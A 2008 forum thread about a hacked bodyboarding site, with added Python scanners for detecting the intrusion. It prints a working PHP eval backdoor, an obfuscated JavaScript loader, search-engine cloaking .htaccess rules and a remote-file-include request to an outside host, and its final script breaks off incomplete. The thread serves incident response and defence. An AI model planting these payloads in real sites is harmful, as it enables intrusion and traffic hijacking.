Nash (Regular; joined Jan 10, 2006; 86 posts)
Posted: Wed Jan 23, 2008 10:38 pm

Hello all. So, my d*** site got hacked again after a long run without a major hack. This one is pretty ingenious (did a search for this -- didn't find anything). If you go to my site [link], everything seems fine.

BUT, if you search for my site on Google (and this sucks because I am #1 on Google now for Bodyboarding), and click my link through there [link], you get this friggin page that a hacker set up on my site somehow that just links to a bunch of ad referral sites.

Questions:
1) How the heck do I fix this? Can't even tell where the problem is.
2) How do I prevent this? Most of my traffic is (was) Google driven.
3) Since this hacker is making ad revenue through these ads, there must be some way to trace him. I'd be willing to pay a few $ to trace it and bust this guy.

Thoughts? Please, please help. Thanks.

kguske (Site Admin; joined Jun 04, 2004; 4887 posts)
Posted: Wed Jan 23, 2008 10:59 pm

Contact your host. This looks like a DNS problem.

evaders99 (Moderator; joined Apr 30, 2004; 2853 posts)
Posted: Wed Jan 23, 2008 11:01 pm

That is a very interesting trick. When I go through Google first, it looks like the ad page loads and is cached. All subsequent requests go there until I do a hard refresh (alt-F5).

I don't see anything obvious in the HTML. So it must be something in the PHP files themselves... some code that tracks referrals and redirects them.

Probably no way to track, but get access logs anyway. Look for anything suspicious (I know it's a real manual process.. but until you can find the vulnerability, you don't know much). He could easily hide under a proxy IP or another server he has hacked.

Nash (Regular; joined Jan 10, 2006; 86 posts)
Posted: Wed Jan 23, 2008 11:16 pm

Hey everyone.

So, I was thinking ... rewrite problem. What rewrites? Let me check htaccess. Sure enough, there she was, inserted above my NukeSentinel htaccess code:
Code:
Options All -Indexes
DirectoryIndex index.php index.htm index.html
# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=
RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <54
RewriteRule ^.*$ /osc/images/apebu/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520c
RewriteRule ^/(.*)$  http://www.eastcoastbodyboarding.com/2004/$1 [L,R=301]


So, now the more important follow up questions:

1) what does this mean? Did someone hack into my actual FTP folder or host account?!?! I have a long alphanum password, so don't know how that could get cracked...

Can someone "insert" this type of stuff without compromising other stuff?

2) Can I bust this b-stard?

3) Going through the raw logs ... have never done it, believe it or not. Would be grateful for guidance as to how to look through them (I know how to get them, just never had to "read" them before)

Thanks for the quick responses. Interesting hack!

Further update -- the rewrite rule appears to be accessing a file in an OSCommerce folder [link]


Last edited by Nash on Wed Jan 23, 2008 11:23 pm; edited 1 time in total
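The rule chain Nash pasted explains what he and evaders99 saw: a request is rewritten to t.htm only when its Referer is a search-engine results page carrying a query parameter (first three conditions) and only during 54 seconds of every minute (%{TIME_SEC} <54), so a direct visit never matches and the behaviour comes and goes. The following Python check is an added example, not code from the thread or from NukeSentinel: it scans an .htaccess file for the traits of that injection: directives hidden behind long runs of leading spaces, referrer conditions keyed on search engines, time-of-day conditions, bare 32-hex marker comments, and rewrite targets that point at a page stored under an images directory. The sample file is constructed, modelled on Nash's block with the engine list shortened and example.com as the redirect target; the 40-space padding threshold is an assumption.

```python
import re
from typing import Dict, List

SEARCH_ENGINES = re.compile(r"\b(google|msn|yahoo|live|ask|yandex|rambler|bing)\b", re.I)
HEX_MARKER = re.compile(r"^#\s*[0-9a-f]{32}\s*$", re.I)
PAGE_IN_IMAGE_DIR = re.compile(r"/(images?|img)/.*\.(htm|html|php|txt)$", re.I)
PAD_THRESHOLD = 40  # assumed: hand-written .htaccess files rarely indent at all


def scan_htaccess(text: str, pad_threshold: int = PAD_THRESHOLD) -> List[Dict]:
    """Return one finding per suspicious line: line number, text without padding, reasons."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        stripped = raw.strip()
        if not stripped:
            continue
        indent = len(raw) - len(raw.lstrip())
        reasons = []
        if indent >= pad_threshold:
            reasons.append("%d leading spaces (pushes the directive off screen in an editor)" % indent)
        if HEX_MARKER.match(stripped):
            reasons.append("bare 32-hex comment (marker delimiting an injected block)")
        if stripped.startswith("RewriteCond"):
            if "%{HTTP_REFERER}" in stripped and SEARCH_ENGINES.search(stripped):
                reasons.append("referrer cloaking: rule only fires for search-engine visitors")
            if "%{TIME_" in stripped:
                reasons.append("time-dependent condition: behaviour comes and goes")
        elif stripped.startswith("RewriteRule"):
            parts = stripped.split()
            if len(parts) >= 3 and PAGE_IN_IMAGE_DIR.search(parts[2]):
                reasons.append("rewrite target is a page stored under an images directory")
        if reasons:
            findings.append({"line": lineno, "text": stripped, "reasons": reasons})
    return findings


def print_report(text: str) -> None:
    for f in scan_htaccess(text):
        print("line %d: %s" % (f["line"], f["text"][:70]))
        for r in f["reasons"]:
            print("    - " + r)


# Constructed sample modelled on the block above (engine list shortened, redirect
# target replaced by example.com); each injected line is padded with 300 spaces.
PAD = " " * 300
SAMPLE_HTACCESS = "\n".join([
    "Options All -Indexes",
    "DirectoryIndex index.php index.htm index.html",
    PAD + "# a0b4df006e02184c60dbf503e71c87ad",
    PAD + "RewriteEngine On",
    PAD + r"RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask)\. [NC]",
    PAD + r"RewriteCond %{HTTP_REFERER} [?&](q|query|p|search_string)\=",
    PAD + "RewriteCond %{TIME_SEC} <54",
    PAD + "RewriteRule ^.*$ /osc/images/apebu/ex3/t.htm [L]",
    PAD + "# a995d2cc661fa72452472e9554b5520c",
    "RewriteRule ^/(.*)$ http://www.example.com/2004/$1 [L,R=301]",
]) + "\n"

if __name__ == "__main__":
    print_report(SAMPLE_HTACCESS)
```

Run it against a real file with `print_report(open(".htaccess").read())`; a file that only contains your own rules yields no findings, so any output is worth reading line by line.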

evaders99 (Moderator; joined Apr 30, 2004; 2853 posts)
Posted: Wed Jan 23, 2008 11:20 pm

1) Yes, it is possible they did. They could brute force the password, if your server has no protection against it.

2) Probably not. Unless you can find him and declare some kind of monetary loss as a result, the police probably won't help. And likely the hacker isn't even in a country where you could prosecute him.

3) I usually start by filtering the obvious stuff. Delete lines that load images or whatever. Look for any weird coding symbols, connections to remote files, etc. Probably that's the way the hacker got in rather than any FTP access.

You should change all the passwords and make sure your files are clean. Restore a clean backup if possible.

Edit: now that I look at it again, the place to start is the /osc/images directory where these ad files are stored. Maybe if you're running OSC, that is what was hacked
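evaders99's triage recipe (drop the image loads, then look for odd symbols and connections to remote files) can be scripted so that a full day of raw logs reduces to a short list. The Python below is an added example, not something from the thread or from cPanel: it parses Apache common/combined log lines, discards ordinary image and CSS loads, and flags a remote URL passed as a parameter, a PHP script sitting in a directory that should only hold static files, a POST to a PHP file that is not a known form handler, and a .js or .htm file served from an images directory, noting when the server answered 200. The log lines are constructed with RFC 5737 documentation addresses, modelled on the requests Nash reports later in this thread; the form_endpoints allowlist is an assumption you fill in with your own site's real form handlers.

```python
import re
from collections import Counter
from typing import Dict, List, Optional, Sequence

# Apache common/combined log prefix; the referer/agent tail, if present, is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
STATIC_EXT = (".gif", ".jpg", ".jpeg", ".png", ".ico", ".css")
STATIC_DIRS = ("/images/", "/img/", "/uploads/", "/languages/")  # assumed layout
REMOTE_INCLUDE = re.compile(r"=(https?|ftp)(:|%3a)(/|%2f){2}", re.I)


def parse_line(line: str) -> Optional[Dict]:
    m = LOG_RE.match(line)
    if not m:
        return None  # truncated or foreign format: skip rather than guess
    e = m.groupdict()
    e["status"] = int(e["status"])
    e["path"], _, e["query"] = e["target"].partition("?")
    return e


def classify(e: Dict, form_endpoints: Sequence[str] = ()) -> List[str]:
    reasons = []
    low = e["path"].lower()
    if REMOTE_INCLUDE.search(e["target"]):
        reasons.append("remote URL passed as a parameter (remote-file-include attempt)")
    if low.endswith(".php") and any(d in low for d in STATIC_DIRS):
        reasons.append("PHP script in a directory that should only hold static files")
    if e["method"] == "POST" and low.endswith(".php") and e["path"] not in form_endpoints:
        reasons.append("POST to a PHP file that is not a known form handler")
    if low.endswith((".js", ".htm", ".html")) and "/images/" in low:
        reasons.append("script or page served from an images directory")
    if reasons and e["status"] == 200:
        reasons.append("server answered 200, so the request succeeded")
    return reasons


def triage(lines, form_endpoints: Sequence[str] = ()) -> Dict:
    flagged, by_ip = [], Counter()
    for line in lines:
        e = parse_line(line)
        if e is None or e["path"].lower().endswith(STATIC_EXT):
            continue  # drop unparseable lines and ordinary image/css loads
        reasons = classify(e, form_endpoints)
        if reasons:
            flagged.append({"ip": e["ip"], "time": e["time"],
                            "request": e["method"] + " " + e["target"],
                            "status": e["status"], "reasons": reasons})
            by_ip[e["ip"]] += 1
    return {"flagged": flagged, "by_ip": by_ip}


# Constructed sample log (documentation IP ranges), modelled on the thread's requests.
SAMPLE_LOG = """\
192.0.2.10 - - [07/Mar/2008:11:20:00 -0700] "GET /index.php HTTP/1.1" 200 8120
192.0.2.10 - - [07/Mar/2008:11:20:01 -0700] "GET /images/logo.gif HTTP/1.1" 200 2300
198.51.100.7 - - [07/Mar/2008:11:24:13 -0700] "GET /modules.php?name=http://203.0.113.5/images/cs.txt? HTTP/1.1" 403 512
198.51.100.8 - - [07/Mar/2008:11:26:01 -0700] "POST /shopping/ext/modules/tise.php HTTP/1.1" 200 3172
198.51.100.9 - - [07/Mar/2008:11:27:12 -0700] "POST /shopping/admin/includes/languages/english/images/namogofer.php HTTP/1.0" 401 0
198.51.100.10 - - [07/Mar/2008:14:07:14 -0700] "GET /osc/images/apebu/check.js HTTP/1.0" 404 0
198.51.100.11 - - [07/Mar/2008:14:07:43 -0700] "GET /osc/images/apebu/check.js HTTP/1.1" 200 1602
192.0.2.11 - - [07/Mar/2008:14:10:00 -0700] "POST /modules.php?name=Your_Account HTTP/1.1" 200 4100
"""

if __name__ == "__main__":
    report = triage(SAMPLE_LOG.splitlines(), form_endpoints=("/modules.php",))
    for f in report["flagged"]:
        print(f["ip"], f["status"], f["request"])
        for r in f["reasons"]:
            print("    - " + r)
    print("requests per IP:", dict(report["by_ip"]))
```

A 404 on a flagged path is still worth keeping: a burst of 404s for one file followed by a 200 is exactly the pattern Nash describes for check.js, and the timestamps between them bracket when the file appeared.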

Nash (Regular; joined Jan 10, 2006; 86 posts)
Posted: Wed Jan 23, 2008 11:45 pm

thanks so much -- so, looking at some of the sites that this was referring to, my internet sleuth buddy thinks he found the culprit. A lot of the links point to this IP [link], which leads to this guy [link].

He is very tech savvy, and owns a bunch of domains that these links pointed at...

I also found this site which had a similar problem: [link]

Doulos (Involved; joined Jun 06, 2005; 373 posts)
Posted: Thu Jan 24, 2008 11:19 am

I stopped using OSC because it was too much work trying to keep up with the holes hackers kept finding. It seemed like every time I looked there was another security warning. I am guessing that it would be ok, if you stay on top of all the updates (and your site is not one of the unlucky first ones the hackers find a new hole in). But, since I am a user, not a programmer - don't listen to me. Same with Coppermine. Though, when I tried to get rid of it my users threw a fit so I just make sure I do frequent backups - just in case.

Nash (Regular; joined Jan 10, 2006; 86 posts)
Posted: Fri Jan 25, 2008 12:04 am

yeah -- he accessed it again today after I changed my cpanel / ftp passwords to very long complex strings. must be some sort of injection into my htaccess file?

evaders99 (Moderator; joined Apr 30, 2004; 2853 posts)
Posted: Fri Jan 25, 2008 2:39 pm

Must be a vulnerable file or a backdoor left on your system

Nash (Regular; joined Jan 10, 2006; 86 posts)
Posted: Sun Jan 27, 2008 12:38 pm

OK -- so I have looked through my raw log files, but was unable to detect any patterns, nor could I find anyone who specifically accessed my htaccess file in there. Should I be looking for "GET" or "POST" actions? Would anyone be willing to take a quick look at my logs?

My htaccess has been rewritten twice since I fixed it the first time.

Is there a way to tell when that happened and who did it?

Also, I have been looking through my "latest visitors" list in cpanel and found a few interesting things. One was a script on here: modules.php?name=http://amygirl.siteburg.com/images/cs.txt?
that someone tried to use but sentinel caught

The other was very curious and looks very suspicious. It was this PHP file being accessed [link]


I checked out the code in this file and it is doing this:

Code:
<?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo "</pre>"; ?>   


Any ideas?

This is the IP that did it: 202.216.177.18

evaders99 (Moderator; joined Apr 30, 2004; 2853 posts)
Posted: Sun Jan 27, 2008 2:21 pm

You should completely remove that file. It allows backdoor access into your site.
There must have been some vulnerability that allowed him to get this file on your server. But it's pretty much going through every access to see whether your site was vulnerable to a specific vulnerability
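The file Nash posted has a recognisable shape: errors turned down, an md5() of a POST parameter compared against a hard-coded 32-hex digest, and on success the contents of an uploaded file read from its tmp_name and passed to eval(). Those traits can be searched for across a whole document root, which is how you find "a couple of others like it" instead of just the one that showed up in the visitor list. The scanner below is an added example, not from the thread: it scores each PHP file by which indicators it contains. The weights and threshold are my own constructed scoring, not a standard; the two PHP samples are constructed (the backdoor-shaped one uses an all-zero placeholder digest and a benign contact-form handler is included for comparison).

```python
import os
import re
from typing import Dict, List

# (name, pattern, weight). Weights and THRESHOLD are a constructed scoring for illustration.
INDICATORS = [
    ("eval-call",          re.compile(r"\beval\s*\(", re.I), 3),
    ("decode-then-eval",   re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I), 5),
    ("upload-read",        re.compile(r"\$(_FILES|HTTP_POST_FILES)\s*\[[^\]]+\]\s*\[\s*['\"]tmp_name['\"]\s*\]", re.I), 2),
    ("md5-gated-password", re.compile(r"md5\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b.*?==\s*['\"][0-9a-f]{32}['\"]", re.I), 4),
    ("shell-from-request", re.compile(r"\b(system|passthru|shell_exec|exec|popen|proc_open)\s*\(.*\$_(GET|POST|REQUEST|COOKIE)\b", re.I), 5),
    ("errors-suppressed",  re.compile(r"error_reporting\s*\(\s*[01]\s*\)", re.I), 1),
]
THRESHOLD = 5


def scan_source(src: str) -> Dict:
    """Score one PHP source text; 'suspicious' means the weighted hits reach THRESHOLD."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(src)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return {"hits": hits, "score": score, "suspicious": score >= THRESHOLD}


def scan_tree(root: str, exts=(".php", ".phtml", ".inc")) -> List[Dict]:
    """Walk a document root and return scored files with at least one hit, worst first."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    r = scan_source(fh.read())
            except OSError:
                continue
            if r["hits"]:
                r["path"] = path
                results.append(r)
    return sorted(results, key=lambda r: r["score"], reverse=True)


# Constructed sample shaped like the script in the thread; the digest is an all-zero placeholder.
SAMPLE_BACKDOOR = r'''<?php error_reporting(1);
if (md5($_POST["p"]) == "00000000000000000000000000000000") {
    $code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"), $HTTP_POST_FILES["f"]["size"]);
    eval($code);
}
?>'''

# Constructed benign contact-form handler for comparison.
SAMPLE_FORM = r'''<?php
$name = isset($_POST['name']) ? htmlspecialchars($_POST['name'], ENT_QUOTES) : '';
$body = isset($_POST['message']) ? htmlspecialchars($_POST['message'], ENT_QUOTES) : '';
if ($name !== '' && $body !== '') {
    mail('owner@example.com', 'Contact form', "$name wrote:\n$body");
}
echo '<p>Thanks.</p>';
?>'''

if __name__ == "__main__":
    for label, src in (("backdoor-shaped", SAMPLE_BACKDOOR), ("contact form", SAMPLE_FORM)):
        print(label, scan_source(src))
```

Point `scan_tree()` at the document root; a legitimate template engine that calls eval() alone scores 3 and is listed but not marked suspicious, while the combination of eval() with an uploaded-file read or a digest-gated password crosses the threshold.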

Nash (Regular; joined Jan 10, 2006; 86 posts)
Posted: Sun Jan 27, 2008 2:25 pm

Thanks evaders -- removed that file and a couple of others like it. I think my problem is that I can't tell what a "normal" looking log entry is.

Just noticed that my NSN 2.4 was not set to do any automatic blocking. I will enable this. Think I should probably update my raven nuke as well

montego (Site Admin; joined Aug 29, 2004; 7487 posts; Arizona)
Posted: Mon Jan 28, 2008 6:32 am

In looking at where they have placed this file, it sure does sound to me like a hole in OSC. Does OSC allow for image uploads, such as for products? If so, I am almost 100% positive that is where the hole is. Their image upload code isn't ensuring that the file is in fact an image. Sorry, but there is no excuse for that!

gotcha (Regular; joined Mar 14, 2005; 79 posts)
Posted: Tue Jan 29, 2008 11:50 am

Are you on shared hosting? Another possibility is that if the server isn't set up right it could be another user on the machine writing to the .htaccess and writable folders. It would be a good idea to check who the owner of that "yoyub.php" file is and if it isn't you, then you've found the problem. My ftp client shows owner and group so that is how I check. Another way to check is through ssh (if you have access): just cd to the directory of the file and use the command "ls -al".

bobbyg (Regular; joined Dec 05, 2007; 72 posts; Tampa, Florida)
Posted: Sat Feb 02, 2008 12:28 pm

If your IP address changes because you are hosting on your own computer/server and you do not have a dedicated IP via your ISP, you could easily be creating this problem whenever you shut down. If your domain name is "parked" because it cannot find the IP address, Google will show "parked" by. Prior to December 2007 "Wild West Domains", sister to "GoDaddy", had incorrect instructions on how to handle DNS pointers.

Nash (Regular; joined Jan 10, 2006; 86 posts)
Posted: Sun Feb 03, 2008 4:20 pm

thanks for the feedback everyone. Hosted on hostmonster.com.

I think that the hole was in the old OSC that I had sitting dormant on the site.

shshaun (New Member; joined Feb 06, 2008; 1 post)
Posted: Wed Feb 06, 2008 10:19 am

Hi guys,

I also have come across this type of malicious code.

I'm a web dev and one of my clients asked me to check why his site was redirecting to this black spammer blog type of site.. I took a look and found it only goes to the black blogger type site from search engines; if you enter the URL directly it works fine..

So after more digging around looking for the usual things like .htaccess files, index pages with redirects, etc. I found nothing.. then I asked my friend to take a look, and his AV reported trojan.js.redirector.e (Kaspersky).. and reported the file.. so I checked the file and sure enough it looked like malicious code, so I ftp'd to the location and also discovered some other files..

I found some other people had the same problem: [link]

The funny thing is that my client does not have osCommerce or Wordpress installed on his site, only custom code.. No web apps whatsoever.. (Unless the intruders somehow compromised his phpMyAdmin).. but just shortly before he asked me to check this problem he said he terminated his new programmer because of some problems.. so I'm guessing this programmer is the creator of this code, or perhaps he planted it in retaliation for his termination.. hmm.. anyway, the malicious files were placed in a different directory where js and images were stored, and also the php scripts had different names from you guys' (and others') findings..

After inspecting the root .htaccess again I saw that the rules for the redirection were buried down in the file after spaces and line feeds.

montego (Site Admin; joined Aug 29, 2004; 7487 posts; Arizona)
Posted: Wed Feb 06, 2008 6:48 pm

shshaun, interesting and definitely suspicious of the fired programmer. Hopefully they shut down his/her access immediately after.

Nash (Regular; joined Jan 10, 2006; 86 posts)
Posted: Sat Feb 09, 2008 3:56 pm

yeah -- the inserted code into htaccess is after a lot of blank space to make it hard to find. When I downloaded my site files to check the backup, I also found some trojan files placed on there. Might have been kaspersky as well.

dad7732 (Worker; joined Mar 18, 2007; 228 posts)
Posted: Wed Mar 05, 2008 7:48 am

What a hacker running a script (which is obviously the case here) does is locate, by script, any/all files with 777 world-writable permissions. Look in your OSC directories for any files with 777 and chmod them to 775 or better. 775 is not even a guarantee, but it is much better protection than 777.

Also, include this code at the beginning of your .htaccess file:
Code:
<Files ~ "^\.ht">
    Order allow,deny
    Deny from all
    Satisfy All
</Files>


This will at least give some protection in case anyone tries to read your .htaccess file. Don't know if this will prevent a script writing to it or not.

Jay
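dad7732's advice (find anything at 777) and gotcha's earlier point (check who owns the odd file) are the same audit, and it pairs naturally with montego's observation that PHP landed under an images directory. The script below is an added example, not from the thread: it walks a tree and reports world-writable files and directories, files not owned by the expected account, and server-side scripts sitting inside image or upload directories. hardened_mode() strips only the world-write bit, so 777 becomes 775 as suggested above and a 644 file such as Nash's .htaccess is left alone. The directory names treated as image/upload locations are an assumption, and nothing is changed on disk unless fix=True is passed.

```python
import os
import stat
from typing import Dict, List, Optional

WORLD_WRITE = stat.S_IWOTH  # the 0o002 bit dad7732 is warning about
SCRIPT_EXT = (".php", ".phtml", ".php3", ".php4", ".php5", ".cgi", ".pl")
IMAGE_DIRS = ("images", "img", "uploads", "thumbs")  # assumed upload/image directory names


def hardened_mode(mode: int) -> int:
    """Strip the world-write bit and nothing else: 0o777 -> 0o775, 0o644 -> 0o644."""
    return mode & ~WORLD_WRITE


def classify(path: str, mode: int, uid: int, expected_uid: Optional[int]) -> List[str]:
    """Pure check on stat() values, so it can be exercised without touching the disk."""
    reasons = []
    if mode & WORLD_WRITE:
        reasons.append("world-writable (%o)" % stat.S_IMODE(mode))
    if expected_uid is not None and uid != expected_uid:
        reasons.append("owned by uid %d, expected %d" % (uid, expected_uid))
    parts = path.lower().replace("\\", "/").split("/")
    if path.lower().endswith(SCRIPT_EXT) and any(p in IMAGE_DIRS for p in parts[:-1]):
        reasons.append("server-side script inside an image/upload directory")
    return reasons


def audit_tree(root: str, expected_uid: Optional[int] = None, fix: bool = False) -> List[Dict]:
    """Report every file or directory under root that classify() objects to."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if stat.S_ISLNK(st.st_mode):
                continue  # judge the target on its own path, not through the link
            reasons = classify(full, st.st_mode, st.st_uid, expected_uid)
            if reasons:
                findings.append({"path": full, "mode": "%o" % stat.S_IMODE(st.st_mode), "reasons": reasons})
                if fix and st.st_mode & WORLD_WRITE:
                    os.chmod(full, hardened_mode(stat.S_IMODE(st.st_mode)))
    return findings


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for f in audit_tree(root, expected_uid=os.getuid()):
        print(f["mode"], f["path"])
        for r in f["reasons"]:
            print("    - " + r)
```

On shared hosting the expected uid is your own account (os.getuid() when run over SSH as that account); a file in your tree owned by anyone else, including the web server user, is the case gotcha describes.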

Nash (Regular; joined Jan 10, 2006; 86 posts)
Posted: Wed Mar 05, 2008 12:52 pm

thanks!

Nash (Regular; joined Jan 10, 2006; 86 posts)
Posted: Wed Mar 05, 2008 1:21 pm

just checked -- was already at 644

Nash (Regular; joined Jan 10, 2006; 86 posts)
Posted: Fri Mar 07, 2008 4:57 pm

It's really amazing to me now that I have been monitoring my logs by hand now for a couple of weeks. Unfortunately, after I fix a hole, they find some new method to do the same thing a few days later.

The end result is that 1) mystery files end up on my server (see exhibit b) and 2) my .htaccess gets code inserted into it.

The attacks come from a TON of IP addresses, but I see patterns: a ton of GET requests through certain folders, particularly "themes" and "/shopping". Often, they look for a file osc/apebu/check.js (I deleted the OSC folder weeks ago). They get 404s on some files. Simultaneously, there are POST attempts. These have varied by the day, and could be unrelated. Today they were trying to post ("POST /shopping/admin/phpMyAdmin/namogofer.php HTTP/1.1" 401) and ("POST /shopping/admin/includes/languages/english/images/namogofer.php HTTP/1.0" 401) a lot, always resulting in a 401.

However, someone was able to get this through:
83.16.216.114 - - [07/Mar/2008:11:26:01 -0700] "POST /shopping/ext/modules/tise.php HTTP/1.1" 200 3172. (The code for this file was the same as exhibit b.)
Then this guy got through:
65.97.250.141 - - [07/Mar/2008:11:27:12 -0700] "POST /surfline/ijocun.php

Then, after lots of attempts, someone (IP: 220.237.237.109) got a 200, when GETing check.js, because the file has reappeared on my server: 220.237.237.109 - - [07/Mar/2008:14:07:43 -0700] "GET /osc/images/apebu/check.js HTTP/1.1" 200 1602

Only a few minutes before that file apparently didn't exist:
70.168.144.60 - - [07/Mar/2008:14:01:50 -0700] "GET /osc/images/apebu/check.js HTTP/1.1" 404
71.126.114.178 - - [07/Mar/2008:14:07:14 -0700] "GET /osc/images/apebu/check.js HTTP/1.0" 404

I have also found that tons of my .js files are infected/injected with code like in exhibit a

Check.js code is in exhibit b below. It is the same as tise.php and the other random files I've found them post. Sometimes I can see the file appear with POST, sometimes not.

I also found some odd code in another seemingly legit file they accessed called general.js. The code that I think they inserted is in exhibit a.

Exhibit a
Code:

/* a0b4df006e02184c60dbf503e71c87ad */ ;eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%31%35%32%35%36%37%3B%20%4A%53%53%33%20%3D%20%27%2F%6F%73%63%2F%69%6D%61%67%65%73%2F%61%70%65%62%75%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%6F%73%63%2F%69%6D%61%67%65%73%2F%61%70%65%62%75%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20')); /* a995d2cc661fa72452472e9554b5520c */



In this latest round, I can't quite tell where it is. If someone would be willing to look at the logs with me, that would be awesome. Free shirt to whoever can, haha. The thing is, from the logs, I can't tell how htaccess is having code inserted into it, as htaccess never shows up. All I see are these files:

Exhibit B
Code:

<?php
error_reporting(1);
global $HTTP_SERVER_VARS;

function say($t) { echo "$t\n"; }

function testdata($t) {
    say(md5("testdata_$t"));
}

echo "<pre>";
testdata('start');
if (md5($_POST["p"]) == "aace99428c50dbe965acc93f3f275cd3") {
    if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"), $HTTP_POST_FILES["f"]["size"])) {
        eval($code);
    } else {
        testdata('f');
    }
} else {
    testdata('pass');
}
testdata('end');
echo "</pre>";
?>


A link to a site with someone else trying to understand this code, and the md5 condition: [link].

I am trying to follow this code, but am unfamiliar with some functions. I will look them up. What does it mean when they do testdata_$t ?? I don't understand the _$t part of that.
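Exhibit a is a URL-encoded loader wrapped in eval(unescape(...)). Decoded, it checks whether an element with id JSSS already exists, assigns three globals the snippet itself never uses (JSS1 = 59, JSS2 = 152567, JSS3 = '/osc/images/apebu/dummy.htm'), creates a <script> element with src /osc/images/apebu/check.js and id JSSS, and appends it to <head>. That is why every page carrying the injected .js keeps fetching check.js, and why the file keeps being dropped back on the server. The helper below is an added example, not from the thread: it finds such calls in a JavaScript source, decodes them the way JavaScript's unescape() does (including %uXXXX code units, which urllib alone would leave in place), and lists the script sources the payload injects together with the 32-hex marker comments around it. The sample file is constructed inside the block by re-encoding the decoded loader (minus the unused globals) between the same two markers exhibit a uses.

```python
import re
from urllib.parse import quote, unquote
from typing import Dict, List

EVAL_UNESCAPE = re.compile(
    r"eval\s*\(\s*unescape\s*\(\s*(['\"])(?P<enc>.*?)\1\s*\)\s*\)", re.S)
MARKER = re.compile(r"/\*\s*([0-9a-f]{32})\s*\*/", re.I)
SRC_ATTR = re.compile(r"setAttribute\(\s*['\"]src['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)")
SRC_PROP = re.compile(r"\.src\s*=\s*['\"]([^'\"]+)['\"]")


def js_unescape(s: str) -> str:
    """Mimic JavaScript unescape(): %uXXXX code units first, then %XX as single code points."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")


def decode_eval_unescape(source: str) -> List[str]:
    """Return the decoded payload of every eval(unescape('...')) call in the source."""
    return [js_unescape(m.group("enc")) for m in EVAL_UNESCAPE.finditer(source)]


def injected_sources(decoded: str) -> List[str]:
    """Script URLs a decoded loader would add, via setAttribute('src', ...) or .src = ..."""
    return SRC_ATTR.findall(decoded) + SRC_PROP.findall(decoded)


def analyze_js(source: str) -> Dict[str, List[str]]:
    payloads = decode_eval_unescape(source)
    sources = [src for p in payloads for src in injected_sources(p)]
    return {"payloads": payloads, "sources": sources, "markers": MARKER.findall(source)}


# Constructed sample: the loader exhibit a decodes to (without its unused JSS1..3 globals),
# re-encoded with quote() so the block builds its own input instead of pasting the long string.
LOADER = ("if (!document.getElementById('JSSS')){ var js = document.createElement('script'); "
          "js.setAttribute('src', '/osc/images/apebu/check.js'); js.setAttribute('id', 'JSSS'); "
          "document.getElementsByTagName('head').item(0).appendChild(js) };")
SAMPLE_JS = ("function init() { setup(); }\n"
             "/* a0b4df006e02184c60dbf503e71c87ad */ ;eval(unescape('"
             + quote(LOADER, safe="") + "')); /* a995d2cc661fa72452472e9554b5520c */\n")

if __name__ == "__main__":
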